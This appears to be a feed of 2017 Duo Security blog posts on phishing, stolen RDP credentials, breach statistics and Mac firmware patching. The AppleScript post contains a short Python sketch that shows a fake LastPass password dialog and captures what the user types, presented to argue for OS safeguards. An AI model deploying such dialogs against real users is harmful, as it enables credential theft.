It’s important to note that OAuth isn’t just supported by Gmail. Many service providers such as social networks support OAuth as a means to allow applications to access specific resources on behalf of users. It’s no stretch to say that this same type of attack abusing OAuth permissions could be effective on other services as well.

How to Protect Yourself

Click Carefully

OAuth phishing isn’t going away. The success of this campaign suggests that we are likely to see more of this type of phishing moving forward. These attacks are easy to automate, are cheap to set up, and, as we saw on Wednesday, are very effective.

The first step for protecting yourself against this type of phishing scam is to be careful which links you click on in emails. These emails all had the recipient listed as a “mailinator” address (a disposable email service), with the actual recipient BCC’d. This could be a hint that the email may not be legitimate.

The next step to protecting yourself from OAuth phishing attacks is to be careful which applications you let access your account. When you encounter a new application request, review the permissions to determine if you’re ok with letting the app have access to those parts of your account. A good tip is to be as careful with OAuth permissions as you are with your actual credentials.

You can also review information about the developer of the application to help determine if it might be malicious. By clicking the application name (in this case, “Google Docs”), you can see the following:

Developer Info

In this case, the email address for the developer appears to be a non-official personal Gmail account.

Also, as part of the OAuth process, you are redirected back to the third-party application when you allow access. In this case, you are redirected back to a URL that tries to look legitimate, but is not an actual URL operated by Google.

Review Existing Applications

This is a good time to review what applications have access to your Google account. Over time, you may have given permission to applications that you no longer use. However, those applications can still have access to your Google account unless you explicitly revoke their access.

You can review which applications have access to your Google account (and revoke that access) by going to https://myaccount.google.com/permissions.

In this case, if you allowed the fake “Google Docs” application to access your Google account, you can revoke it by going to the permissions page, finding the “Google Docs” entry and clicking “Remove:”

Remove Apps


This attack was a great example of how powerful OAuth phishing can be. However, while this event spread rapidly, the great work from service providers like Google and Cloudflare to shut down the attacker’s infrastructure helped rein in the attack just as quickly as it began.

As OAuth phishing becomes more common, it’s important to be careful when letting new applications access your account, as well as regularly reviewing which applications still have access.

To assess your organization’s risk of getting phished, launch an internal phishing campaign using our free phishing tool, Duo Insight.

<![CDATA[The macOS Phishing Easy Button: AppleScript Dangers]]> pbruienne@duo.com(Pepijn Bruienne) https://duo.com/blog/the-macos-phishing-easy-button-applescript-dangers https://duo.com/blog/the-macos-phishing-easy-button-applescript-dangers Duo Labs Thu, 04 May 2017 09:45:00 -0400

The Issue

The recently discovered OSX.Bella malware, which gets much of its payload from an Open Source Software (OSS) post-exploitation toolkit by the same name, reminds us again how easy it is for an attacker to create legitimate-looking phishing dialogs using built-in macOS scripting functionality.

By writing a few lines of AppleScript, an attacker can use system tools like System Preferences, App Store or iTunes to present a legitimate-looking dialog prompting the victim to re-enter their Apple ID or local user account credentials in order to fix a problem an application on their system is having.

Because there was no actual issue, the application continues to work as expected, giving the victim the impression that the prompt was legitimate and that they helped rectify the issue. Afterwards, the attacker can use the captured credentials to elevate privileges and take actions of their choosing, such as deploying malware or taking control of the victim’s Apple ID account.

What is AppleScript?

Before we continue, let’s look at what makes all of this possible. AppleScript is Apple’s native scripting language; it has shipped with Apple’s Macintosh operating system since System 7 in 1991 and with every version since. As such, it is deeply embedded in the OS and has far-reaching capabilities, since it is supported by many system tools, especially those with a user-facing UI.

AppleScript has been popular among home users and professionals alike for its ability to bridge the gap between what the OS can do out of the box and what third-party applications offer, as well as for batch processing. To make creating AppleScript applications or system services even easier, Apple has also shipped the drag-and-drop driven Automator with macOS since version 10.4.

Why Use AppleScript?

One of the reasons AppleScript has remained popular with Mac users is because it is very easy to create a GUI-driven scripted workflow or self-contained application. Getting user input and displaying results is easy by using the display dialog verb which is available for any application that is AppleScript-compatible.

For example, one might create a script for Apple’s Mail application that gathers email messages from a certain sender by showing a prompt that allows the user to type in the name or email address to search for.

A dialog as shown in Figure 1 can be created with a single line of AppleScript:

Figure 1

The AppleScript snippet that tells Mail to show the dialog looks like this:

tell application "Mail" to activate
tell application "Mail" to display dialog "Please enter the email address to search for..." default answer "" with icon 1 with title "Mail"

In order to execute the above snippet, copy and paste it into Script Editor, which ships with macOS and can be found at /Applications/Utilities/Script Editor.app.

Applescript Screenshot

Beyond Apple’s core services, there are many third-party applications that also support scripting via AppleScript. For example, if we wanted to write an AppleScript tool that searches our bookmarks for a URL, (ignoring for a second that Chrome has its own search capabilities), we could start with a dialog prompting the user for a website title or URL to search for, as shown in Figure 2:

Figure 2

AppleScript Goes Bad

As is clear from these simple examples, an unsuspecting victim might assume that these dialogs are part of a trusted application, since they carry the application’s icon and a generally “normal” macOS look and feel, when in actuality they were generated by an unrelated script. This is convenient for someone developing scripted workflows, as it allows them to focus on functionality and application logic instead of creating UI elements from scratch. However, it wouldn’t be a big stretch of the imagination to apply these “easy button UI” capabilities to something a lot less wholesome:

Session Timeout

Wait a minute. What did we just do? In fact, we did nothing different from the previous examples where we were searching Apple Mail for email or Google Chrome for a website. All we needed to do was to tell the LastPass application to show a dialog with the application’s icon and text and buttons of our choosing. To be clear, none of the output generated by entering text in the password field or by clicking the Cancel or OK buttons would get sent to the LastPass application.

Instead, our script generating the dialog would receive the password in plaintext as well as the name of the button the victim clicked. The attacker could then take further steps to exfiltrate the victim’s LastPass Vault contents without their knowledge.
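To illustrate how little work this takes, here is a hedged Python sketch (macOS only; the target app and dialog text are purely illustrative placeholders) showing that whatever the victim types is returned to the calling script:

```python
import subprocess

# Illustrative only: the target app ("LastPass") and the dialog text are
# placeholders; any AppleScript-capable app could be borrowed the same way.
PHISH = ('tell application "LastPass" to display dialog '
         '"Your session has timed out. Please re-enter your master password." '
         'default answer "" with hidden answer with icon 1 with title "LastPass"')

def run_phish():
    """Run the dialog via osascript (macOS only).

    osascript prints something like 'button returned:OK, text returned:hunter2',
    i.e. the victim's input comes back to *this* process, not to LastPass.
    """
    result = subprocess.run(["osascript", "-e", PHISH],
                            capture_output=True, text=True)
    return result.stdout
```

The `with hidden answer` clause even gives the dialog a proper password-style input field, completing the illusion while the plaintext lands in the attacker’s script.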

Other examples would be capturing the victim’s macOS account credentials to elevate privileges (if the victim is an administrator), or starting other processes that run on the victim’s behalf and send captured data to a remote command and control server. Or, as the OSX.Bella malware does, prompting the victim to enter their Apple ID credentials.

Pro-Level AppleScript Phishing

Successful phishing attacks are all about meeting the implicit expectations of users to avoid raising suspicions of something being amiss. The recent introduction of the MacBook Pro with Touch Bar brought a Touch ID sensor to the macOS desktop experience, and with it a change in how users interact with their system when authenticating.

Extending the ruse of what has been discussed above to the new Touch ID workflow is relatively simple and we can come up with a sequence that looks something like this:

  • First, an alert dialog is displayed by System Preferences, which is a familiar application to the victim.
  • The victim is alerted to the fact that a timeout has occurred and that they must re-authenticate in order to keep using Touch ID.
  • Optionally, this could be made to trigger only when the victim opens an application to make it seem as if the Touch ID re-authentication prompt was triggered by it.
  • The attacker shows a secondary dialog using an available Touch ID icon that is part of macOS in order to complete the look and feel of a legitimate Touch ID prompt.
  • Once the victim enters their credentials, the attacker stores them for further use.
  • The victim will not notice any different Touch ID behavior since it was never in an unauthenticated state to begin with.
  • The deception is complete; the credentials have been obtained.

A short animated sequence showing this in action can be seen in Figure 3:

Figure 3

The interesting thing to note here is the ease with which a new system workflow can be turned against users, preying on their expectations and muscle memory. For sensitive or privileged operations like authentication, operating system designers need to think carefully about how their UI and UX communicate the source of user-facing prompts, and develop a clear way for users to easily and reliably decide how much trust to place in the action they are being asked to perform. A clearly defined, recognizable credential-request UI that is gated by the OS and unavailable to AppleScript could help, but it would take time to gain user trust as the “One True Way” an application can request credentials.


In our opinion, it is entirely too easy for an attacker to borrow (or hijack if you will) any AppleScript-capable application to prompt the victim with a legitimate-looking UI and ask them to enter any amount of sensitive data like passwords, two-factor authentication (2FA) codes, or other information.

Because the OS gives no warning that another process is attempting to show a dialog via an application it is not part of, it is far too easy to gain a victim’s trust. It would be good security practice if macOS required the user to explicitly approve an AppleScript script’s access to an application before that script could show any alerts or dialogs.

For example, the user is shown such prompts in other parts of the OS when an application requires elevated privileges or when it requires Accessibility privileges in order to function. In all those cases, the OS intervenes on behalf of the requesting application by obtaining user authentication or authorization and performs the requested action before allowing the requesting application to proceed. It is time for Apple to apply the same security measures to AppleScript to prevent this type of phishing.

<![CDATA[Stop the Pwnage: 81% of Hacking Incidents Used Stolen or Weak Passwords]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/stop-the-pwnage-81-of-hacking-incidents-used-stolen-or-weak-passwords https://duo.com/blog/stop-the-pwnage-81-of-hacking-incidents-used-stolen-or-weak-passwords Industry News Tue, 02 May 2017 09:45:00 -0400

According to the 10th edition of the Verizon Data Breach Investigations Report, 81 percent of hacking-related breaches leveraged stolen and/or weak passwords. Other trends include a jump in phishing, web application and ransomware attacks.

The Pervasiveness of Phishing

Stolen passwords may be the result of the proliferation of phishing - the attack method was found in over 90% of both security incidents and breaches. The top industries phished include manufacturing, information (tech), retail and healthcare.

Of the phishing attacks that led to a breach, 95% were followed by some sort of software installation. After a user opens a malicious attachment, an exploit kit’s payload launches, probing the user’s computer and leveraging vulnerabilities in Flash or other out-of-date software, browsers or plugins to install malware on the machine. This malware may include keyloggers or other tools for stealing data such as usernames, passwords, intellectual property and credit card numbers.

Web Application Attacks

In attacks against web applications, the use of stolen credentials, phishing, backdoors and command & control (C2) servers accounted for 60% of the incidents (note: findings were heavily influenced by data involved in the Dridex botnet takedown). In these attacks, personal data is now the most frequently compromised type of data, taking the place of credentials from last year.

The report offers up a few security recommendations to help protect web applications, including:

  • Limit the amount of personal information and site credentials stored on web apps or backend databases to the minimum required to run operations, and encrypt the rest
  • Use a second factor of authentication for web applications, which would require a completely different attack pattern to compromise than passwords
  • Patch your content management systems (CMS) and plugins, and make sure you get notified of out-of-cycle patches

Within the information (tech) industry, when smaller businesses’ user credentials are breached, they typically just reset passwords, since they often don’t have dedicated security staff or processes in place. More proactive security measures include implementing two-factor authentication or patch management of web applications to prevent breaches.

Rise & Commodification of Ransomware

Ransomware has jumped from the 22nd most common variety of malware to the fifth most common, according to Verizon. Major industries targeted by ransomware include public administration, healthcare and financial services, and many cases of ransomware targeting hospitals were publicized widely in the media in 2016.

The commodification of the malware has become known as ransomware-as-a-service, offering lucrative extortion capabilities to anyone who can purchase it. The data shows that the exploit kits used to deliver it shifted from Angler to Neutrino to RIG by the end of last year. As a type of crimeware-as-a-service, RIG can be rented for $200 a week, according to research from Recorded Future.

These exploit kits are sent via phishing, accounting for 21% of incidents. Typically, a ransomware phishing email targets employees working in departments that frequently open attachments, such as human resources (HR) or accounting.

According to Heimdal Security, the RIG exploit kit detects eight different vulnerabilities in unpatched software and downloads the Cerber ransomware onto a target system.

While the vulnerabilities used are always changing, as of January, they included:

  • Four critical vulnerabilities affecting Adobe Flash Player (including two that were patched in 2015)
  • Two affecting Microsoft Edge (Microsoft’s latest web browser running on Windows 10)
  • One affecting Internet Explorer versions 9, 10 and 11
  • One affecting Microsoft Silverlight

The ransomware may spread throughout a victim’s system and encrypt their data, locking them out until they pay attackers a ransom to decrypt their files.

Duo’s 2016 Trusted Access Report: Microsoft Edition found that nearly 62% of devices running Internet Explorer had an old version of Flash installed, meaning they may have been susceptible to known vulnerabilities packaged into the RIG exploit kit. And based on research from Cisco’s Talos Intelligence Group on RIG payloads and user agent information, the most commonly exploited victims include users browsing with Internet Explorer on Windows platforms.

Security Hygiene and Patching

Basic security hygiene can help reduce risks associated with known vulnerabilities, like those packaged into exploits sent as attachments in phishing emails. Keep your server software up to date, including operating systems, web applications, browsers and plugins.

For Flash, which is a major target, consider uninstalling it or enabling click-to-play to prevent Flash from automatically launching in web browsers. Many major browsers have this feature on by default, including Chrome, which uses HTML5 by default whenever available. Ad blockers can also help prevent exploitation via malvertising.

Also, access security solutions can give you insight into the endpoints logging into your applications, letting you detect, block or warn users about out-of-date Flash plugins running on their devices - before they access your environment. When it comes to patch cycle time, most organizations completed patch processes within 12 weeks, with user devices patched most quickly, then servers, then network devices, which aren’t patched until the end of the quarter, according to the report.

Unsurprisingly, the information industry patches most quickly, and comprehensively, fixing 97.5% of vulnerability findings. Manufacturing and healthcare also rank higher on patch time and comprehensiveness. The education industry is slower - on average, they only fix about 18% of vulnerability findings over the 12-week period. The public and finance industries are also slower when it comes to patching.

Learn more about the current state of device security health in Duo’s Trusted Access Report.

<![CDATA[Education, Healthcare & Government Targeted by Stolen RDP Logins]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/education-healthcare-and-government-targeted-by-stolen-rdp-logins https://duo.com/blog/education-healthcare-and-government-targeted-by-stolen-rdp-logins Industry News Mon, 01 May 2017 09:45:00 -0400

Education, healthcare and government are among the most frequently targeted industries, at least when it comes to the amount of stolen remote desktop protocol (RDP) logins up for sale on the dark web, according to an analysis of 85,000 servers from Flashpoint. Other targeted industries include legal and aviation.

Microsoft’s RDP client allows a user to remotely connect to another computer running RDP server software over a network connection. It provides a way for system administrators to support servers and PCs remotely. While convenient for remote administrators, it’s also a convenient point of entry for malicious hackers, who use brute-force (programmatic password-guessing) attacks to gain access to RDP servers.

Online criminals use these attacks to find legitimate RDP credentials and put them up for sale on one of the largest dark web marketplaces known as xDedic, effectively selling access to RDP servers connected to systems belonging to educational institutions, healthcare organizations, federal entities, legal firms and many others.

That means that if malicious hackers can access RDP servers using just a username and password, they can move laterally within the network, create backdoors, install malware, steal data, alter settings and more. Windows is the most frequently targeted platform; unsurprisingly so, as Windows accounts for 63% of devices, according to our analysis of data in The 2016 Duo Trusted Access Report (stay tuned - our 2017 edition is coming soon). Sixty-five percent of those Windows devices are running an older version of the operating system, Windows 7, which means they’re missing out on many security features of the latest version, Windows 10.

Back when I wrote about xDedic last summer, it was defunct - now it appears to have emerged once again on the dark web, accessible via Tor with a new address. In a June 2016 report from Kaspersky Lab, access to over 70,000 servers from 173 different countries was up for sale on xDedic. They also found 453 servers with point-of-sale (POS) software installed, meaning they may have been used for some type of credit and debit card processing by companies in the retail industry.

In an analysis of one hacked server, Kaspersky Lab found that attackers compromised it by brute-forcing the RDP password, then installed malware that connected to a command & control (C&C) server. In an analysis of the victim servers that connected to several of the C&C servers that Kaspersky Lab had sinkholed, they were able to identify government entities and universities as some of the high-profile targets.

How can organizations protect against the risk of stolen and sold RDP credentials? Take inventory of your administrator RDP accounts and remove them if they’re not necessary to reduce your attack surface.
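Monitoring for brute-force activity also helps: password-guessing against RDP leaves a telltale pattern of failed-logon bursts (Windows Event ID 4625 on the target host) from a single source. A minimal detection sketch, assuming failed-logon events have already been exported as (source IP, username) pairs; the sample data and threshold are illustrative:

```python
from collections import Counter

# Hypothetical exported failed-logon events (Windows Event ID 4625);
# in practice these would come from your event logs or SIEM.
failed_logons = [
    ("203.0.113.7", "administrator"),
    ("203.0.113.7", "admin"),
    ("203.0.113.7", "administrator"),
    ("198.51.100.2", "jsmith"),
] + [("203.0.113.7", f"user{i}") for i in range(50)]

THRESHOLD = 20  # failed attempts per source IP before we flag it (assumed)

def flag_brute_force(events, threshold=THRESHOLD):
    """Return source IPs whose failed-logon count meets the threshold."""
    counts = Counter(ip for ip, _ in events)
    return {ip: n for ip, n in counts.items() if n >= threshold}

print(flag_brute_force(failed_logons))  # {'203.0.113.7': 53}
```

Real deployments would window these counts over time and feed the flagged sources into a firewall block list or an alert, but the core signal is just this: one source, many failures.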

Then implement two-factor authentication to protect access to every RDP account login using secure methods like U2F or Duo Push to mitigate the risk of a remote attacker logging into your RDP servers with a brute-forced password. That way, the attacker would need to physically tap your USB device or approve a push notification on your phone, in addition to using your password to be granted access.

Guide to Securing Remote Access Cover

Download our free guide, The Essential Guide to Securing Remote Access: Preventing Data Breaches With Strong Authentication, to learn more.

Ideal for security, compliance and risk management officers, IT administrators and other professionals concerned with information security, this guide is for any organization that needs to secure remote access to their environment.

<![CDATA[Phishing Across the Pond: 70% of U.K. Universities Impacted]]> jwright@duo.com(Jordan Wright) https://duo.com/blog/phishing-across-the-pond-70-percent-of-uk-universities-impacted https://duo.com/blog/phishing-across-the-pond-70-percent-of-uk-universities-impacted Duo Labs Wed, 26 Apr 2017 05:00:00 -0400

Back in November 2016, we filed Freedom of Information (FoI) requests to 70 universities across the U.K. asking questions around each institution’s experiences with phishing. The responses we received indicate that phishing is still a major security challenge – even for top universities.

70% of U.K. universities indicate falling victim to phishing attacks

The FoI Results

Multiple factors make universities a popular target for phishing attacks. They have a large, diverse user base consisting of students, faculty and staff, and they hold the sensitive personal information for these users as well as alumni. In addition, universities are frequently involved in grant funded, innovative research that is valuable to a motivated attacker.

Phishing data from our survey of U.K. universities

The results of our FoI requests show firsthand the exposure universities have to phishing. Seventy percent of the universities who responded to these requests indicated that they have fallen victim to a phishing attack, with 12 of these universities reporting they had been attacked more than ten times in the past year. Seven of the universities that responded, including those with GCHQ Certified degree courses – Oxford University and Cranfield University – reported they had been struck more than 50 times.

“The findings reveal that universities – staff and students – make popular targets for these attacks, which leaves them vulnerable to all kinds of security risks. ... They open the doors to hackers, with stolen credentials, to access an organisation’s system virtually undetected, posing as an authorised user. Worryingly, phishing is now the most popular way of delivering ransomware onto an organisation’s network.”
– Henry Seddon, Duo Security Vice President of EMEA

One thing is clear from our results: Phishing remains an important security issue affecting universities.

Phishing Affects Everyone

Universities aren’t alone. It’s important to remember that, while these results are focused on the education space, phishing affects everyone. The most recent data from our free phishing simulation tool, Duo Insight, shows that on average, 13% of users will fall victim to phishing attacks, with 61% of the campaigns resulting in at least one user attempting to submit credentials to our fake phishing page.

And stolen credentials are only one side of the phishing story. Malware is commonly delivered by exploit kits, which use known vulnerabilities to exploit out-of-date devices. With just the click of a link in a phishing email, these exploit kits can compromise a user's device. In our simulated campaigns, on average 25% of users clicked these links. That’s why it’s important to not only keep your devices up-to-date, but to also have visibility into the devices accessing your critical applications.

How to Protect Yourself and Your Organization from Phishing

The Trouble With Phishing

Phishing protection requires a defense-in-depth strategy. There are multiple mitigating factors you can put in place at each layer of the attack chain to help prevent users from falling victim to a phishing email, including:

  • Leverage 2FA For Critical Applications - Phishing attacks regularly aim to steal credentials from users which are then used by attackers to access applications. Enforcing 2FA ensures that stolen credentials can’t be used by attackers to access your applications.

  • Keep Devices Up-To-Date - As mentioned earlier, credentials are only part of the phishing threat. Knowing which devices are accessing your applications and ensuring these devices are up-to-date is critical to protecting against exploit kits which are used in phishing as well as other attacks such as malvertising.

  • Measure Your Exposure to Phishing - You can’t take action on what you can’t measure. We recommend regularly leveraging our free phishing simulation tool, Duo Insight, to measure your organization’s exposure to phishing. Plus, in our blog we offer recommendations to get more value out of your Duo Insight results and decrease your overall exposure to phishing.

These tips are basic measures you can take to significantly mitigate the effectiveness of phishing attacks. For a more comprehensive view on how these attacks are executed and measures to prevent them, check out our free guide, The Trouble With Phishing.

In this guide, you’ll get:

  • the latest phishing statistics by industry
  • a breakdown of how phishing works
  • the anatomy of a phishing attack

Download the guide today.


Phishing attacks aren’t going away anytime soon. 2016 was a record-breaking year for the number of unique phishing sites seen, and as our results show, these attacks continue to be effective. But by implementing the basic security hygiene measures covered here, you'll make great strides toward mitigating phishing for your organization, giving both security and peace of mind.

<![CDATA[Duo Signs Letter Supporting Vulnerability Disclosure Process for NIST]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/duo-signs-letter-supporting-vulnerability-disclosure-process-for-nist https://duo.com/blog/duo-signs-letter-supporting-vulnerability-disclosure-process-for-nist Press and Events Tue, 18 Apr 2017 09:00:00 -0400

Duo signed a joint letter penned by Rapid7 recommending the addition of a vulnerability disclosure and handling process in the National Institute of Standard and Technology’s (NIST) cybersecurity framework. NIST’s call for public comment on version 1.1 of its Framework for Improving Critical Infrastructure Cybersecurity brought the issue to light.

Several other security companies and organizations, such as Cisco, Symantec, Bugcrowd and many others, including the Center for Democracy & Technology, the Electronic Frontier Foundation (EFF), etc. also signed the letter.

The impetus behind the comments is to clarify the existing elements of the framework and outline processes for receiving, assessing and mitigating security vulnerabilities from outside sources, such as independent researchers.

According to the letter, the benefits of a coordinated vulnerability disclosure and handling process include:

  • Organizations can quickly detect and respond to reported vulnerabilities
  • Responding quickly helps organizations increase the security, data privacy and safety of their systems
  • Security researchers and other vulnerability reporters are protected, reducing conflict and misunderstanding
  • Organizations with limited cybersecurity resources can benefit from external discovery of vulnerabilities in their products, services, infrastructure and system configuration

The letter also points out that best practices for vulnerability disclosure and handling processes already exist through the ISO 29147 and 30111 standards, which can serve as useful roadmaps customized to each organization’s needs. Katie Moussouris, co-editor of ISO 29147 vulnerability disclosure & ISO 30111 vulnerability handling processes, has also signed the letter supporting the proposed revisions.

According to Rapid7, if the Framework includes this revision, they hope it will lead to more companies and government agencies adopting these processes, which will both strengthen security overall and ease communication with security researchers.

Read the full letter and get more detailed information on the explicit changes: Joint Comments on "Framework for Improving Critical Infrastructure Cybersecurity" version 1.1 Before the National Institute of Standards and Technology.

<![CDATA[Don’t Get Sonic Screwed: Update Your S%&#]]> pbruienne@duo.com(Pepijn Bruienne) https://duo.com/blog/dont-get-sonic-screwed-update-your-sand https://duo.com/blog/dont-get-sonic-screwed-update-your-sand Duo Labs Wed, 12 Apr 2017 09:00:00 -0400


  • Security vulnerabilities are just as much of a fact of life in firmware as they are in software
  • Patching firmware vulnerabilities is often less visible than patching software vulnerabilities, and may not be monitored in configuration management systems to the same extent that software patching is
  • In the case of Apple hardware, the combination of the model of Apple hardware you run and the version of the OS you run will determine whether firmware vulnerabilities are patched or not
  • Only Apple devices capable of running the macOS 10.12.x branch of the OS have received firmware patches for all of the currently publicly known firmware vulnerabilities; this is true even if you are running the latest security patches Apple released for OS X 10.11.x and 10.10.x
  • Understanding your Apple fleet’s software and hardware versions is required if you want to quantify your exposure to firmware vulnerabilities

Recent events surrounding Apple and widely-reported vulnerabilities of its Macintosh products are once more emphasizing the importance of applying macOS security updates as quickly as possible. This is because security updates not only contain patches for the macOS software itself, but they also deliver very important updates to the device’s firmware, commonly referred to as EFI or the Boot ROM.

A Mac’s EFI contains low-level functionality that handles early boot functionality immediately following power-up. It helps to connect external peripherals like a network device or a display and ultimately selects a valid macOS boot device before handing off control to the OS itself. This firmware lives in its own writable ROM environment and can be updated with changes and fixes just like macOS.

And just like any other software, EFI is susceptible to bugs that can be exploited by attackers to gain low-level control of a target Mac. The methods by which EFI vulnerability exploitation is achieved are a little different than exploiting macOS vulnerabilities, but the results can have a bigger impact due to the privileged position the EFI firmware has in the boot chain.

Because security fixes for Apple’s firmware are far less visible to end users and administrators than software-based security fixes, they can often go unnoticed. This raised some questions for us about the actual attack surface of the Apple ecosystem in terms of firmware vulnerabilities. This blog post covers some of the background of Apple firmware vulnerabilities and our initial findings from looking into how Apple supplies firmware updates to devices in the field across a range of OS versions.

A Short History of Leaked Apple Vulnerabilities

So why is any of this important? On March 23rd 2017, Wikileaks released additional documents from its Vault 7 collection of CIA content that focused on Apple iOS and macOS devices. While a very interesting event in and of itself, many security experts agreed that since the leaked information was a number of years old, it offered no new vulnerabilities or exploitation concepts against the Apple ecosystem.

One of the most talked about aspects of the leak was the set of capabilities codenamed Sonic Screwdriver, a toolkit that enabled the introduction of modified EFI firmware to a targeted Mac. To be able to place a modified EFI firmware on a target Mac, the agency allegedly used a modified Apple Thunderbolt Ethernet adapter connected to the target system while it performed a boot, which allowed the exploitation of a vulnerability in Apple’s firmware to load a modified version that could include keyloggers, data exfiltration tools and so on.

Of particular note is the timeline the leaked documents establish with regard to other research taking place in the security community. The concept of exploiting the fact that a Mac will blindly load option ROMs (embedded device drivers) from attached Thunderbolt devices at boot was first presented in theory at Black Hat USA in January 2012 by security researcher Loukas K, aka Snare. Only months later, the agency had developed and documented a complete solution for loading modified EFI firmware onto a target Mac. Apple would go on to hire Snare for its firmware security team in 2016.

The first complete chain of exploitation was shown in public some years later, when Trammell Hudson of Two Sigma presented it at the 31st Chaos Computer Club conference in Germany in 2014. Trammell named the exploit “Thunderstrike”; it loads a malicious payload using similar hardware and methods to those described in the CIA documents. This is not to say that any of these events were connected, but it does show that the general concept of gaining low-level system presence with long-term persistence was known for a number of years, and was only addressed by Apple after Trammell’s public disclosure in 2014, with the release of OS X 10.10.2 on January 27, 2015. Details of a second, more powerful version named Thunderstrike 2 were published in August 2015, when Trammell Hudson and Xeno Kovah of LegbaCore presented it at the Black Hat security conference in Las Vegas. This vulnerability was patched by Apple in OS X 10.10.4.

What’s the Vulnerability of the Apple Ecosystem’s Firmware?

What does this actually mean to those of us who use Apple systems every day? Apple gave an official statement to TechCrunch soon after the Wikileaks disclosure stating: “[...] our preliminary assessment shows the alleged Mac vulnerabilities were previously fixed in all Macs launched after 2013.” While this is good news for the many users who purchased Macs on or after late 2013 and who are running up-to-date versions of macOS, it still leaves a sizeable portion of users in a potentially vulnerable state. The next question is obviously, how do you know if you are vulnerable? To answer this we need to look at the Apple Mac ecosystem from the perspective of both hardware and software.

From a hardware perspective, if you own a Mac older than the following models, and you are running an OS X version older than 10.10 Yosemite, then you definitely did not receive the firmware update that prevents either the Sonic Screwdriver or Thunderstrike attacks:

  • MacBook Pro Retina (Mid 2012),
  • MacBook Air (Mid 2013 and later),
  • iMac (Late 2013 and later),
  • Mac Pro (Late 2013),
  • Mac mini (Late 2014)

From a purely software perspective, Apple has never released firmware updates for OS X versions prior to OS X 10.10. This means that if you are running OS X 10.9 or earlier on Mac hardware of any age, it is also vulnerable (and will likely never be patched).

In order to gather a quantitative view into how large of a population is still vulnerable to these attacks, we conducted some analysis of Duo’s endpoint authentication logs and found that as of late February 2017, around 10% of unique endpoint check-ins reported OS X versions of 10.9 or older.

These endpoints are all vulnerable to Sonic Screwdriver, the Thunderstrike variants, and any other undisclosed tools using the same approaches that may be in use by private or state actors.

Apple Releases Batch of Firmware Security Fixes

Soon after the leak of the CIA documents, Apple released macOS 10.12.4, which as usual contains an extensive list of security fixes, including an updated collection of EFI firmware updates covering the largest set of Mac models to date. Noteworthy were EFI firmware updates for Mac models that had not received any updates since 2012 or earlier, due to updated Internet Recovery options that are part of the firmware:

  • MacBook Air (11-inch, Late 2010)
  • MacBook Pro (13-inch, Mid 2010)
  • Mac mini (Mid 2010)

Beyond the much discussed new Night Shift feature added in 10.12.4, two fixes in the EFI firmware updates released by Apple in the 10.12.4 update stand out.

The first issue allowed an attacker with specialized Thunderbolt-based equipment to retrieve FileVault 2 full-disk encryption (FDE) keys from memory, which could then be used to unlock the target Mac after a reboot and, if automatic login was enabled, to log into the user’s account. It is unclear at this time whether the aforementioned older models that are now included in the EFI updates also received this security update, even though some of them have expansion ports that could technically be vulnerable, such as the MacBook Pro (13-inch, Mid 2010).

The second important change is one to the firmware that many Mac system administrators have been waiting for Apple to make for some time. What changed? Up until macOS 10.12.3, the Internet Recovery mode used to wipe and reinstall macOS on a target Mac would install the version of the OS the Mac originally shipped with. If a Mac originally shipped with OS X Yosemite and Internet Recovery was invoked at a later time, when a newer version of macOS shipped, the Mac would still receive OS X Yosemite, and it was up to the user to manually upgrade to the latest OS version.

This was a cumbersome procedure and likely resulted in users not bothering to upgrade to the latest OS, causing them to miss out on important security updates and putting themselves at risk. As of the macOS 10.12.4 update, Internet Recovery will now actively determine the newest compatible version of macOS and install it. This will go a long way to ensure that Mac users are always running the latest version of macOS in the event a full OS reload is required. It will also help Mac system administrators who use this Apple-recommended method to repurpose corporate-owned Macs for a new user.

Securing All the Macs

Given all of the above, we have the following recommendations to keep your personal and organization’s Mac systems as secure as possible:

  • First, determine if your Mac is one that can be patched against the discussed vulnerabilities.
    • All Mac models going back to mid-2010 have available updates in macOS 10.12.4, so update your OS to the latest macOS 10.12 Sierra.
    • If you have legacy applications that don’t support macOS 10.12, Apple released a separate patch for older OS X versions through Security Update 2017-001 for 10.10 Yosemite and 10.11 El Capitan, which contains EFI firmware updates, though be aware that they cover a smaller subset of Mac models.
  • Once upgraded, make sure to install all future patches as soon as they become available. All of Apple’s major OS releases have been free for the past few years, so if your Mac supports it, cost won’t be an issue.
  • If your Mac is not in that list and is too old to support OS X 10.10 or later, then these vulnerabilities will never be fixed in your system’s firmware, and it will remain vulnerable. In that case, the easiest advice to give is that this is an excellent time to shop around for a new Mac.
  • If purchasing a new Mac is not an option, then you should consider the uses and privileges that your vulnerable Macs have and limit them to roles that do not have access to sensitive data. Consider network isolation if these older machines require network access.
  • Additionally, given that many of the attacks targeting firmware vulnerabilities require physical access, you can help to defend against them by not using vulnerable devices outside of a physically secured environment and not allowing them to be taken home or on travel.


The one thing to take away from all of the preceding discussion is this: only the current version of macOS will receive the complete set of Apple security patches. Older versions quickly drop off the radar and will leave Macs in a vulnerable state, both from an OS and application standpoint, as well as from a firmware one.

The only way to be sure a Mac is protected is to only run the current macOS version and to apply patches immediately after they are released. Mac system administrators also want to take extra care that the firmware updates that are part of macOS updates can be properly applied by their organization’s management tools and that they can reliably report EFI firmware versions across their fleet. In case your management software is unable to gather this data, we recommend taking a look at osquery and the built-in platform_info table which contains a version key that accurately reflects the EFI firmware version. By keeping track of what firmware versions are installed on your fleet you can more easily mitigate any drift and keep all endpoints protected.
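The osquery check above amounts to a single SQL statement against the platform_info table. A minimal sketch, assuming osqueryi is installed and on your PATH (the sample version string below is illustrative, not from a real machine):

```python
import json
import subprocess

def efi_version_from_json(output):
    """Parse `osqueryi --json` output and return the EFI firmware version string."""
    rows = json.loads(output)
    return rows[0]["version"] if rows else ""

def query_efi_version():
    """Shell out to osqueryi and read platform_info.version (requires osquery)."""
    result = subprocess.run(
        ["osqueryi", "--json", "SELECT version FROM platform_info;"],
        capture_output=True, text=True, check=True,
    )
    return efi_version_from_json(result.stdout)

# Illustrative output shape; a real fleet tool would aggregate this per endpoint.
sample = '[{"version":"MBP114.88Z.0172.B16.1702161608"}]'
print(efi_version_from_json(sample))  # -> MBP114.88Z.0172.B16.1702161608
```

Comparing the collected version strings against the firmware versions Apple ships per model is then a straightforward reporting exercise.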

<![CDATA[The Dallas County Siren Hack]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/the-dallas-county-siren-hack https://duo.com/blog/the-dallas-county-siren-hack Duo Labs Tue, 11 Apr 2017 09:56:00 -0400

